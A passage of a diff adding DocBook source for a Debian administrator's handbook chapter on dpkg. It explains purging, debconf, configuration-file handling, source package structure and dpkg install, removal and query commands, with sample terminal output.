+							For a complete purge of the package (command issued with <command>dpkg --purge</command> or <command>dpkg -P</command>), the configuration files are also deleted, as well as a certain number of copies (<filename>*.dpkg-tmp</filename>, <filename>*.dpkg-old</filename>, <filename>*.dpkg-new</filename>) and temporary files; <command>dpkg</command> then executes <command>postrm purge</command>.
+						</para>
+
+					</listitem>
+
+				</orderedlist>
+				 <sidebar> <title><emphasis>VOCABULARY</emphasis> Purge, a complete removal</title>
+				 <indexterm>
+					<primary>purge of a package</primary>
+				</indexterm>
+				 <para>
+					When a Debian package is removed, the configuration files are retained in order to facilitate possible re-installation. Likewise, the data generated by a daemon (such as the content of an LDAP server directory, or the content of a database for an SQL server) are usually retained.
+				</para>
+				 <para>
+					To remove all data associated with a package, it is necessary to “purge” the package with the command, <command>dpkg -P <replaceable>package</replaceable></command>, <command>apt-get remove --purge <replaceable>package</replaceable></command> or <command>aptitude purge <replaceable>package</replaceable></command>.
+				</para>
+				 <para>
+					Given the definitive nature of such data removals, a purge should not be taken lightly.
+				</para>
+				 </sidebar> <indexterm>
+					<primary><filename>config</filename>, <command>debconf</command> script</primary>
+				</indexterm>
+				 <para>
+					The four scripts detailed above are complemented by a <filename>config</filename> script, provided by packages using <command>debconf</command> to acquire information from the user for configuration. During installation, this script defines in detail the questions asked by <command>debconf</command>. The responses are recorded in the <command>debconf</command> database for future reference. The script is generally executed by <command>apt</command> prior to installing packages one by one in order to group all the questions and ask them all to the user at the beginning of the process. The pre- and post-installation scripts can then use this information to operate according to the user's wishes.
+				</para>
+				 <sidebar> <title><emphasis>TOOL</emphasis> <command>debconf</command></title>
+				 <indexterm>
+					<primary><command>debconf</command></primary>
+				</indexterm>
+				 <para>
+					<command>debconf</command> was created to resolve a recurring problem in Debian. All Debian packages unable to function without a minimum of configuration used to ask questions with calls to the <command>echo</command> and <command>read</command> commands in <filename>postinst</filename> shell scripts (and other similar scripts). But this also means that during a large installation or update the user must stay with their computer to respond to various questions that may arise at any time. These manual interactions have now been almost entirely dispensed with, thanks to the <command>debconf</command> tool.
+				</para>
+				 <para>
+					<command>debconf</command> has many interesting features: it requires the developer to specify user interaction; it allows localization of all the strings displayed to users (all translations are stored in the <filename>templates</filename> file describing the interactions); it has different frontends to display the questions to the user (text mode, graphical mode, non-interactive); and it allows creation of a central database of responses to share the same configuration with several computers... but the most important is that it is now possible to present all of the questions in a row to the user, prior to starting a long installation or update process. The user can go about their business while the system handles the installation on its own, without having to stay there staring at the screen waiting for questions.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section id="sect.conffiles">
+			<title>Checksums, List of Configuration Files</title>
+			 <indexterm>
+				<primary><filename>md5sums</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>conffiles</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>checksums</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>files</primary>
+				<secondary>configuration files</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>configuration</primary>
+				<secondary>files</secondary>
+			</indexterm>
+			 <para>
+				In addition to the maintainer scripts and control data already mentioned in the previous sections, the <filename>control.tar.gz</filename> archive of a Debian package may contain other interesting files. The first, <filename>md5sums</filename>, contains the MD5 checksums for all of the package's files. Its main advantage is that it allows <command>dpkg --verify</command> (which we will study in <xref linkend="sect.dpkg-verify" />) to check if these files have been modified since their installation. Note that when this file doesn't exist, <command>dpkg</command> will generate it dynamically at installation time (and store it in the dpkg database just like other control files).
+			</para>
+			 <para>
+				<filename>conffiles</filename> lists package files that must be handled as configuration files. Configuration files can be modified by the administrator, and <command>dpkg</command> will try to preserve those changes during a package update.
+			</para>
+			 <para>
+				In effect, in this situation, <command>dpkg</command> behaves as intelligently as possible: if the standard configuration file has not changed between the two versions, it does nothing. If, however, the file has changed, it will try to update this file. Two cases are possible: either the administrator has not touched this configuration file, in which case <command>dpkg</command> automatically installs the new version; or the file has been modified, in which case <command>dpkg</command> asks the administrator which version they wish to use (the old one with modifications, or the new one provided with the package). To assist in making this decision, <command>dpkg</command> offers to display a “<command>diff</command>” that shows the difference between the two versions. If the user chooses to retain the old version, the new one will be stored in the same location in a file with the <filename>.dpkg-dist</filename> suffix. If the user chooses the new version, the old one is retained in a file with the <filename>.dpkg-old</filename> suffix. Another available action consists of momentarily interrupting <command>dpkg</command> to edit the file and attempt to re-instate the relevant modifications (previously identified with <command>diff</command>).
+			</para>
+			 <sidebar id="sidebar.questions-conffiles"> <title><emphasis>GOING FURTHER</emphasis> Avoiding the configuration file questions</title>
+			 <para>
+				<command>dpkg</command> handles configuration file updates, but, while doing so, regularly interrupts its work to ask for input from the administrator. This makes it less than enjoyable for those who wish to run updates in a non-interactive manner. This is why this program offers options that allow the system to respond automatically according to the same logic: <command>--force-confold</command> retains the old version of the file; <command>--force-confnew</command> will use the new version of the file (these choices are respected, even if the file has not been changed by the administrator, which only rarely has the desired effect). Adding the <command>--force-confdef</command> option tells <command>dpkg</command> to decide by itself when possible (in other words, when the original configuration file has not been touched), and only uses <command>--force-confnew</command> or <command>--force-confold</command> for other cases.
+			</para>
+			 <para>
+				These options apply to <command>dpkg</command>, but most of the time the administrator will work directly with the <command>aptitude</command> or <command>apt-get</command> programs. It is, thus, necessary to know the syntax used to indicate the options to pass to the <command>dpkg</command> command (their command line interfaces are very similar).
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>apt -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" full-upgrade</userinput></screen>
+			 <para>
+				These options can be stored directly in <command>apt</command>'s configuration. To do so, simply write the following line in the <filename>/etc/apt/apt.conf.d/local</filename> file:
+			</para>
+			 <informalexample> 
+<programlisting>
+DPkg::options { "--force-confdef"; "--force-confold"; }
+</programlisting>
+			 </informalexample> <para>
+				Including this option in the configuration file means that it will also be used in a graphical interface such as <command>aptitude</command>.
+			</para>
+			 </sidebar> <sidebar id="sidebar.questions-conffiles-bis"> <title><emphasis>GOING FURTHER</emphasis> Force dpkg to ask configuration file questions</title>
+			 <para>
+				The <command>--force-confask</command> option requires <command>dpkg</command> to display the questions about the configuration files, even in cases where they would not normally be necessary. Thus, when reinstalling a package with this option, <command>dpkg</command> will ask the questions again for all of the configuration files modified by the administrator. This is very convenient, especially for reinstalling the original configuration file if it has been deleted and no other copy is available: a normal re-installation won't work, because <command>dpkg</command> considers removal as a form of legitimate modification, and, thus, doesn't install the desired configuration file.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.source-package-structure">
+		<title>Structure of a Source Package</title>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>source package</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>source</primary>
+			<secondary>package</secondary>
+		</indexterm>
+		 <section>
+			<title>Format</title>
+			 <indexterm>
+				<primary>DSC file</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>diff.gz</filename> file</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>debian.tar.gz</filename> file</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>orig.tar.gz</filename> file</primary>
+			</indexterm>
+			 <para>
+				A source package is usually comprised of three files, a <filename>.dsc</filename>, a <filename>.orig.tar.gz</filename>, and a <filename>.debian.tar.xz</filename> (or <filename>.diff.gz</filename>). They allow creation of binary packages (<filename>.deb</filename> files described above) from the source code files of the program, which are written in a programming language.
+			</para>
+			 <para>
+				The <filename>.dsc</filename> (Debian Source Control) file is a short text file containing an RFC 2822 header (just like the <filename>control</filename> file studied in <xref linkend="sect.control" />) which describes the source package and indicates which other files are part thereof. It is signed by its maintainer, which guarantees authenticity. See <xref linkend="sect.package-authentication" /> for further details on this subject.
+			</para>
+			 <example>
+				<title>A <filename>.dsc</filename> file</title>
+				 
+<programlisting>
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Format: 3.0 (quilt)
+Source: zim
+Binary: zim
+Architecture: all
+Version: 0.65-4
+Maintainer: Emfox Zhou &lt;emfox@debian.org&gt;
+Uploaders: Raphaël Hertzog &lt;hertzog@debian.org&gt;
+Homepage: http://zim-wiki.org
+Standards-Version: 3.9.8
+Vcs-Browser: https://anonscm.debian.org/cgit/collab-maint/zim.git
+Vcs-Git: https://anonscm.debian.org/git/collab-maint/zim.git
+Build-Depends: debhelper (&gt;= 9), xdg-utils, python (&gt;= 2.6.6-3~), libgtk2.0-0 (&gt;= 2.6), python-gtk2, python-xdg, dh-python
+Package-List:
+ zim deb x11 optional arch=all
+Checksums-Sha1:
+ 4a9be85c98b7f4397800f6d301428d64241034ce 1899614 zim_0.65.orig.tar.gz
+ 0ec38c990ec7662205dd0c843bf81f9033906a2e 10332 zim_0.65-4.debian.tar.xz
+Checksums-Sha256:
+ 5442f3334395a2beafc5b9a2bbec2e53e38270d4bad696b5c4053dd51dc1ed96 1899614 zim_0.65.orig.tar.gz
+ 78271df16aa166dce916b3ff4ecd705ed3a8832e49d3ef0bd8738a4fe8dd2b4f 10332 zim_0.65-4.debian.tar.xz
+Files:
+ 63ab7a2070e6d1d3fb32700a851d7b8b 1899614 zim_0.65.orig.tar.gz
+ 648559b38e04eaf4f6caa97563c057ff 10332 zim_0.65-4.debian.tar.xz
+
+-----BEGIN PGP SIGNATURE-----
+Comment: Signed by Raphael Hertzog
+
+iQEzBAEBCgAdFiEE1823g1EQnhJ1LsbSA4gdq+vCmrkFAlgzZXkACgkQA4gdq+vC
+mrnyXAf+M/PzZFjqk6Hvv1QSbocIDZ3bEqRjVpNLApubsPsEZZT6yw9vypzNE2hZ
+/BbLPa0Ntbhew4U+SJpuujV7VnLs9mZgOFuKRHKWYQBQ+oxw+gtM6iePwVj58aP/
+LW7K5gE428ohMdjIkf42Lz4Fve3dVPgPLIzQxRZ87N6OKqmS81M6/RRIF3TS/gJp
+CwpN1yifCfQs46gxL5/CgA4uhI8taz+g+8ZDd6fL5BQeFuNsgplY4QL1uGno3F7G
+VY7WZhM601Re2ePnv+6vjh8kDWMjZhfB4RJy0+hHezuoVGKljyaxc1O4P/fxvXus
+CEETju6cAE/HgDubDXDqExMwEd4odA==
+=HUvj
+-----END PGP SIGNATURE-----</programlisting>
+
+			</example>
+			 <indexterm>
+				<primary><literal>Build-Depends</literal>, header field</primary>
+			</indexterm>
+			 <para>
+				Note that the source package also has dependencies (<literal>Build-Depends</literal>) completely distinct from those of binary packages, since they indicate tools required to compile the software in question and construct its binary package.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Distinct namespaces</title>
+			 <para>
+				It is important to note here that there is no required correspondence between the name of the source package and that of the binary package(s) that it generates. It is easy enough to understand if you know that each source package may generate several binary packages. This is why the <filename>.dsc</filename> file has the <literal>Source</literal> and <literal>Binary</literal> fields to explicitly name the source package and store the list of binary packages that it generates.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>CULTURE</emphasis> Why divide into several packages</title>
+			 <para>
+				Quite frequently, a source package (for a given software) can generate several binary packages. The split is justified by the possibility to use (parts of) the software in different contexts. Consider a shared library, it may be installed to make an application work (for example, <emphasis role="pkg">libc6</emphasis>), or it can be installed to develop a new program (<emphasis role="pkg">libc6-dev</emphasis> will then be the correct package). We find the same logic for client/server services where we want to install the server part on one machine and the client part on others (this is the case, for example, of <emphasis role="pkg">openssh-server</emphasis> and <emphasis role="pkg">openssh-client</emphasis>).
+			</para>
+			 <para>
+				Just as frequently, the documentation is provided in a dedicated package: the user may install it independently from the software, and may at any time choose to remove it to save disk space. Additionally, this also saves disk space on the Debian mirrors, since the documentation package will be shared amongst all of the architectures (instead of having the documentation duplicated in the packages for each architecture).
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>PERSPECTIVE</emphasis> Different source package formats</title>
+			 <para>
+				Originally there was only one source package format. This is the <literal>1.0</literal> format, which associates an <filename>.orig.tar.gz</filename> archive to a <filename>.diff.gz</filename> “debianization” patch (there is also a variant, consisting of a single <filename>.tar.gz</filename> archive, which is automatically used if no <filename>.orig.tar.gz</filename> is available).
+			</para>
+			 <para>
+				Since Debian <emphasis role="distribution">Squeeze</emphasis>, Debian developers have the option to use new formats that correct many problems of the historical format. Format <literal>3.0 (quilt)</literal> can combine multiple upstream archives in the same source package: in addition to the usual <filename>.orig.tar.gz</filename>, supplementary <filename>.orig-<replaceable>component</replaceable>.tar.gz</filename> archives can be included. This is useful with software that is distributed in several upstream components but for which a single source package is desired. These archives can also be compressed with <command>xz</command> rather than <command>gzip</command>, which saves disk space and network resources. Finally, the monolithic patch, <filename>.diff.gz</filename> is replaced by a <filename>.debian.tar.xz</filename> archive containing the compiling instructions and a set of upstream patches contributed by the package maintainer. These last are recorded in a format compatible with <command>quilt</command> — a tool that facilitates the management of a series of patches.
+			</para>
+			 </sidebar> <para>
+				The <filename>.orig.tar.gz</filename> file is an archive containing the source code as provided by the original developer. Debian package maintainers are asked to not modify this archive in order to be able to easily check the origin and integrity of the file (by simple comparison with a checksum) and to respect the wishes of some authors.
+			</para>
+			 <para>
+				The <filename>.debian.tar.xz</filename> contains all of the modifications made by the Debian maintainer, especially the addition of a <filename>debian</filename> directory containing the instructions to execute to construct a Debian package.
+			</para>
+			 <sidebar> <title><emphasis>TOOL</emphasis> Decompressing a source package</title>
+			 <indexterm>
+				<primary><command>dpkg-source</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>decompressing, source package</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>uncompressing, source package</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>unpacking</primary>
+				<secondary>source package</secondary>
+			</indexterm>
+			 <para>
+				If you have a source package, you can use the <command>dpkg-source</command> command (from the <emphasis role="pkg">dpkg-dev</emphasis> package) to decompress it:
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>dpkg-source -x package_0.7-1.dsc</userinput></screen>
+			 <para>
+				You can also use <command>apt-get</command> to download a source package and unpack it right away. It requires that the appropriate <literal>deb-src</literal> lines be present in the <filename>/etc/apt/sources.list</filename> file, however (for further details, see <xref linkend="sect.apt-sources.list" />). These are used to list the “sources” of source packages (meaning the servers on which a group of source packages are hosted).
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>apt-get source <replaceable>package</replaceable></userinput></screen>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Usage within Debian</title>
+			 <para>
+				The source package is the foundation of everything in Debian. All Debian packages come from a source package, and each modification in a Debian package is the consequence of a modification made to the source package. The Debian maintainers work with the source package, knowing, however, the consequences of their actions on the binary packages. The fruits of their labors are thus found in the source packages available from Debian: you can easily go back to them and everything stems from them.
+			</para>
+			 <para>
+				When a new version of a package (source package and one or more binary packages) arrives on the Debian server, the source package is the most important. Indeed, it will then be used by a network of machines of different architectures for compilation on the various architectures supported by Debian. The fact that the developer also sends one or more binary packages for a given architecture (usually i386 or amd64) is relatively unimportant, since these could just as well have been automatically generated.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.manipulating-packages-with-dpkg">
+		<title>Manipulating Packages with <command>dpkg</command></title>
+		 <indexterm>
+			<primary><command>dpkg</command></primary>
+		</indexterm>
+		 <para>
+			<command>dpkg</command> is the base command for handling Debian packages on the system. If you have <filename>.deb</filename> packages, it is <command>dpkg</command> that allows installation or analysis of their contents. But this program only has a partial view of the Debian universe: it knows what is installed on the system, and whatever it is given on the command line, but knows nothing of the other available packages. As such, it will fail if a dependency is not met. Tools such as <command>apt</command>, on the contrary, will create a list of dependencies to install everything as automatically as possible.
+		</para>
+		 <sidebar> <title><emphasis>NOTE</emphasis> <command>dpkg</command> or <command>apt</command>?</title>
+		 <para>
+			<command>dpkg</command> should be seen as a system tool (backend), and <command>apt</command> as a tool closer to the user, which overcomes the limitations of the former. These tools work together, each one with its particularities, suited to specific tasks.
+		</para>
+		 </sidebar> <section>
+			<title>Installing Packages</title>
+			 <indexterm>
+				<primary>installation</primary>
+				<secondary>package installation</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>installation</secondary>
+			</indexterm>
+			 <para>
+				<command>dpkg</command> is, above all, the tool for installing an already available Debian package (because it does not download anything). To do this, we use its <literal>-i</literal> or <literal>--install</literal> option.
+			</para>
+			 <example>
+				<title>Installation of a package with <command>dpkg</command></title>
+				 
+<screen role="scale">
+<computeroutput># </computeroutput><userinput>dpkg -i man-db_2.7.6.1-2_amd64.deb</userinput>
+<computeroutput>(Reading database ... 110431 files and directories currently installed.)
+Preparing to unpack man-db_2.7.6.1-2_amd64.deb ...
+Unpacking man-db (2.7.6.1-2) over (2.7.6.1-1) ...
+Setting up man-db (2.7.6.1-2) ...
+Updating database of manual pages ...
+Processing triggers for mime-support (3.60) ...</computeroutput></screen>
+
+			</example>
+			 <para>
+				We can see the different steps performed by <command>dpkg</command>; we know, thus, at what point any error may have occurred. The installation can also be effected in two stages: first unpacking, then configuration. <command>apt-get</command> takes advantage of this, limiting the number of calls to <command>dpkg</command> (since each call is costly, due to loading of the database in memory, especially the list of already installed files).
+			</para>
+			 <example>
+				<title>Separate unpacking and configuration</title>
+				 
+<screen role="scale">
+<computeroutput># </computeroutput><userinput>dpkg --unpack man-db_2.7.6.1-2_amd64.deb</userinput>
+<computeroutput>(Reading database ... 110431 files and directories currently installed.)
+Preparing to unpack man-db_2.7.6.1-2_amd64.deb ...
+Unpacking man-db (2.7.6.1-2) over (2.7.6.1-2) ...
+Processing triggers for mime-support (3.60) ...
+# </computeroutput><userinput>dpkg --configure man-db</userinput>
+<computeroutput>Setting up man-db (2.7.6.1-2) ...
+Updating database of manual pages ...
+</computeroutput></screen>
+
+			</example>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>unpacking</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>unpacking</primary>
+				<secondary>binary package</secondary>
+			</indexterm>
+			 <para>
+				Sometimes <command>dpkg</command> will fail to install a package and return an error; if the user orders it to ignore this, it will only issue a warning; it is for this reason that we have the different <literal>--force-*</literal> options. The <command>dpkg --force-help</command> command, or documentation of this command, will give a complete list of these options. The most frequent error, which you are bound to encounter sooner or later, is a file collision. When a package contains a file that is already installed by another package, <command>dpkg</command> will refuse to install it. The following messages will then appear:
+			</para>
+			 
+<screen>
+<computeroutput>Unpacking libgdm (from .../libgdm_3.8.3-2_amd64.deb) ...
+dpkg: error processing /var/cache/apt/archives/libgdm_3.8.3-2_amd64.deb (--unpack):
+ trying to overwrite '/usr/bin/gdmflexiserver', which is also in package gdm3 3.4.1-9</computeroutput></screen>
+			 <para>
+				In this case, if you think that replacing this file is not a significant risk to the stability of your system (which is usually the case), you can use the option <literal>--force-overwrite</literal>, which tells <command>dpkg</command> to ignore this error and overwrite the file.
+			</para>
+			 <para>
+				While there are many available <literal>--force-*</literal> options, only <literal>--force-overwrite</literal> is likely to be used regularly. These options only exist for exceptional situations, and it is better to leave them alone as much as possible in order to respect the rules imposed by the packaging mechanism. Do not forget, these rules ensure the consistency and stability of your system.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Effective use of <literal>--force-*</literal></title>
+			 <indexterm>
+				<primary>broken dependency</primary>
+			</indexterm>
+			 <para>
+				If you are not careful, the use of an option <literal>--force-*</literal> can lead to a system where the APT family of commands will refuse to function. In effect, some of these options allow installation of a package when a dependency is not met, or when there is a conflict. The result is an inconsistent system from the point of view of dependencies, and the APT commands will refuse to execute any action except those that will bring the system back to a consistent state (this often consists of installing the missing dependency or removing a problematic package). This often results in a message like this one, obtained after installing a new version of <emphasis role="pkg">rdesktop</emphasis> while ignoring its dependency on a newer version of the <emphasis role="pkg">libc6</emphasis>:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>apt full-upgrade
+</userinput><computeroutput>[...]
+You might want to run 'apt-get -f install' to correct these.
+The following packages have unmet dependencies:
+  rdesktop: Depends: libc6 (&gt;= 2.5) but 2.3.6.ds1-13etch7 is installed
+E: Unmet dependencies. Try using -f.</computeroutput></screen>
+			 <para>
+				A courageous administrator who is certain of the correctness of their analysis may choose to ignore a dependency or conflict and use the corresponding <literal>--force-*</literal> option. In this case, if they want to be able to continue to use <command>apt</command> or <command>aptitude</command>, they must edit <filename>/var/lib/dpkg/status</filename> to delete/modify the dependency, or conflict, that they chose to override.
+			</para>
+			 <para>
+				This manipulation is an ugly hack, and should never be used, except in the most extreme case of necessity. Quite frequently, a more fitting solution is to recompile the package that's causing the problem (see <xref linkend="sect.rebuilding-package" />) or use a new version (potentially corrected) from a repository such as the <literal>stable-backports</literal> one (see <xref linkend="sect.backports" />).
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Package Removal</title>
+			 <indexterm>
+				<primary>removing a package</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>purging a package</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>removal</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>purge</secondary>
+			</indexterm>
+			 <para>
+				Invoking <command>dpkg</command> with the <literal>-r</literal> or <literal>--remove</literal> option, followed by the name of a package, removes that package. This removal is, however, not complete: all of the configuration files, maintainer scripts, log files (system logs) and other user data handled by the package remain. That way disabling the program is easily done by uninstalling it, and it's still possible to quickly reinstall it with the same configuration. To completely remove everything associated with a package, use the <literal>-P</literal> or <literal>--purge</literal> option, followed by the package name.
+			</para>
+			 <example>
+				<title>Removal and purge of the <emphasis role="pkg">debian-cd</emphasis> package</title>
+				 
+<screen><computeroutput># </computeroutput><userinput>dpkg -r debian-cd</userinput>
+<computeroutput>(Reading database ... 112188 files and directories currently installed.)
+Removing debian-cd (3.1.20) ...
+# </computeroutput><userinput>dpkg -P debian-cd</userinput>
+<computeroutput>(Reading database ... 111613 files and directories currently installed.)
+Purging configuration files for debian-cd (3.1.20) ...
+</computeroutput></screen>
+
+			</example>
+
+		</section>
+		 <section>
+			<title>Querying <command>dpkg</command>'s Database and Inspecting <filename>.deb</filename> Files</title>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>status</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>file list</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>content inspection</secondary>
+			</indexterm>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Option syntax</title>
+			 <para>
+				Most options are available in a “long” version (one or more relevant words, preceded by a double dash) and a “short” version (a single letter, often the initial of one word from the long version, and preceded by a single dash). This convention is so common that it is a POSIX standard.
+			</para>
+			 </sidebar> <para>
+				Before concluding this section, we will study <command>dpkg</command> options that query the internal database in order to obtain information. Giving first the long options and then corresponding short options (that will evidently take the same possible arguments) we cite <literal>--listfiles <replaceable>package</replaceable></literal> (or <literal>-L</literal>), which lists the files installed by this package; <literal>--search <replaceable>file</replaceable></literal> (or <literal>-S</literal>), which finds the package(s) containing the file; <literal>--status <replaceable>package</replaceable></literal> (or <literal>-s</literal>), which displays the headers of an installed package; <literal>--list</literal> (or <literal>-l</literal>), which displays the list of packages known to the system and their installation status; <literal>--contents <replaceable>file.deb</replaceable></literal> (or <literal>-c</literal>), which lists the files in the Debian package specified; <literal>--info<replaceable> file.deb </replaceable></literal> (or <literal>-I</literal>), which displays the headers of this Debian package.
+			</para>
+			 <example>
+				<title>Various queries with <command>dpkg</command></title>
+				 
+<screen role="scale" width="80">
+<computeroutput>$ </computeroutput><userinput>dpkg -L base-passwd</userinput>
+<computeroutput>/.
+/usr
+/usr/sbin
+/usr/sbin/update-passwd
+/usr/share
+/usr/share/base-passwd
+/usr/share/base-passwd/group.master
+/usr/share/base-passwd/passwd.master
+/usr/share/doc
+/usr/share/doc/base-passwd
+/usr/share/doc/base-passwd/README
+/usr/share/doc/base-passwd/changelog.gz
+/usr/share/doc/base-passwd/copyright
+/usr/share/doc/base-passwd/users-and-groups.html
+/usr/share/doc/base-passwd/users-and-groups.txt.gz
+/usr/share/doc-base
+/usr/share/doc-base/users-and-groups
+/usr/share/lintian
+/usr/share/lintian/overrides
+/usr/share/lintian/overrides/base-passwd
+/usr/share/man
+/usr/share/man/de
+/usr/share/man/de/man8
+/usr/share/man/de/man8/update-passwd.8.gz
+/usr/share/man/es
+/usr/share/man/es/man8
+/usr/share/man/es/man8/update-passwd.8.gz
+/usr/share/man/fr
+/usr/share/man/fr/man8
+/usr/share/man/fr/man8/update-passwd.8.gz
+/usr/share/man/ja
+/usr/share/man/ja/man8
+/usr/share/man/ja/man8/update-passwd.8.gz
+/usr/share/man/man8
+/usr/share/man/man8/update-passwd.8.gz
+/usr/share/man/pl
+/usr/share/man/pl/man8
+/usr/share/man/pl/man8/update-passwd.8.gz
+/usr/share/man/ru
+/usr/share/man/ru/man8
+/usr/share/man/ru/man8/update-passwd.8.gz
+$ </computeroutput><userinput>dpkg -S /bin/date</userinput>
+<computeroutput>coreutils: /bin/date
+$ </computeroutput><userinput>dpkg -s coreutils</userinput>
+<computeroutput>Package: coreutils
+Essential: yes
+Status: install ok installed
+Priority: required
+Section: utils
+Installed-Size: 15103
+Maintainer: Michael Stone &lt;mstone@debian.org&gt;
+Architecture: amd64
+Multi-Arch: foreign
+Version: 8.26-3
+Replaces: mktemp, realpath, timeout
+Pre-Depends: libacl1 (&gt;= 2.2.51-8), libattr1 (&gt;= 1:2.4.46-8), libc6 (&gt;= 2.17), libselinux1 (&gt;= 2.1.13)
+Conflicts: timeout
+Description: GNU core utilities
+ This package contains the basic file, shell and text manipulation
+ utilities which are expected to exist on every operating system.
+ .
+ Specifically, this package includes:
+ arch base64 basename cat chcon chgrp chmod chown chroot cksum comm cp
+ csplit cut date dd df dir dircolors dirname du echo env expand expr
+ factor false flock fmt fold groups head hostid id install join link ln
+ logname ls md5sum mkdir mkfifo mknod mktemp mv nice nl nohup nproc numfmt
+ od paste pathchk pinky pr printenv printf ptx pwd readlink realpath rm
+ rmdir runcon sha*sum seq shred sleep sort split stat stty sum sync tac
+ tail tee test timeout touch tr true truncate tsort tty uname unexpand
+ uniq unlink users vdir wc who whoami yes
+Homepage: http://gnu.org/software/coreutils
+$ </computeroutput><userinput>dpkg -l 'b*'</userinput>
+<computeroutput>Desired=Unknown/Install/Remove/Purge/Hold
+| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
+|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
+||/ Name                 Version         Architecture    Description
++++-====================-===============-===============-=============================================
+un  backupninja          &lt;none&gt;          &lt;none&gt;          (no description available)
+un  backuppc             &lt;none&gt;          &lt;none&gt;          (no description available)
+un  baekmuk-ttf          &lt;none&gt;          &lt;none&gt;          (no description available)
+un  base                 &lt;none&gt;          &lt;none&gt;          (no description available)
+un  base-config          &lt;none&gt;          &lt;none&gt;          (no description available)
+ii  base-files           9.9+deb9u1      amd64           Debian base system miscellaneous files
+ii  base-passwd          3.5.43          amd64           Debian base system master password and group 
+ii  bash                 4.4-5           amd64           GNU Bourne Again SHell
+[...]
+$ </computeroutput><userinput>dpkg -c /var/cache/apt/archives/gnupg_2.1.18-8~deb9u1_amd64.deb</userinput>
+<computeroutput>drwxr-xr-x root/root         0 2017-09-18 20:41 ./
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/bin/
+-rwxr-xr-x root/root    996648 2017-09-18 20:41 ./usr/bin/gpg
+-rwxr-xr-x root/root      3444 2017-09-18 20:41 ./usr/bin/gpg-zip
+-rwxr-xr-x root/root    161192 2017-09-18 20:41 ./usr/bin/gpgconf
+-rwxr-xr-x root/root     26696 2017-09-18 20:41 ./usr/bin/gpgparsemail
+-rwxr-xr-x root/root     76112 2017-09-18 20:41 ./usr/bin/gpgsplit
+-rwxr-xr-x root/root    158344 2017-09-18 20:41 ./usr/bin/kbxutil
+-rwxr-xr-x root/root      1081 2014-06-25 16:17 ./usr/bin/lspgpot
+-rwxr-xr-x root/root      2194 2017-09-18 20:41 ./usr/bin/migrate-pubring-from-classic-gpg
+-rwxr-xr-x root/root     14328 2017-09-18 20:41 ./usr/bin/watchgnupg
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/sbin/
+-rwxr-xr-x root/root      3078 2017-09-18 20:41 ./usr/sbin/addgnupghome
+-rwxr-xr-x root/root      2219 2017-09-18 20:41 ./usr/sbin/applygnupgdefaults
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/doc/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/doc/gnupg/
+-rw-r--r-- root/root     18964 2017-01-23 18:39 ./usr/share/doc/gnupg/DETAILS.gz
+[...]
+$ </computeroutput><userinput>dpkg -I /var/cache/apt/archives/gnupg_2.1.18-8~deb9u1_amd64.deb</userinput>
+<computeroutput> new debian package, version 2.0.
+ size 1124042 bytes: control archive=2221 bytes.
+    1388 bytes,    24 lines      control              
+    2764 bytes,    43 lines      md5sums              
+ Package: gnupg
+ Source: gnupg2
+ Version: 2.1.18-8~deb9u1
+ Architecture: amd64
+ Maintainer: Debian GnuPG Maintainers &lt;pkg-gnupg-maint@lists.alioth.debian.org&gt;
+ Installed-Size: 2088
+ Depends: gnupg-agent (= 2.1.18-8~deb9u1), libassuan0 (&gt;= 2.0.1), libbz2-1.0, libc6 (&gt;= 2.15), libgcrypt20 (&gt;= 1.7.0), libgpg-error0 (&gt;= 1.14), libksba8 (&gt;= 1.3.4), libreadline7 (&gt;= 6.0), libsqlite3-0 (&gt;= 3.7.15), zlib1g (&gt;= 1:1.1.4)
+ Recommends: dirmngr (= 2.1.18-8~deb9u1), gnupg-l10n (= 2.1.18-8~deb9u1)
+ Suggests: parcimonie, xloadimage
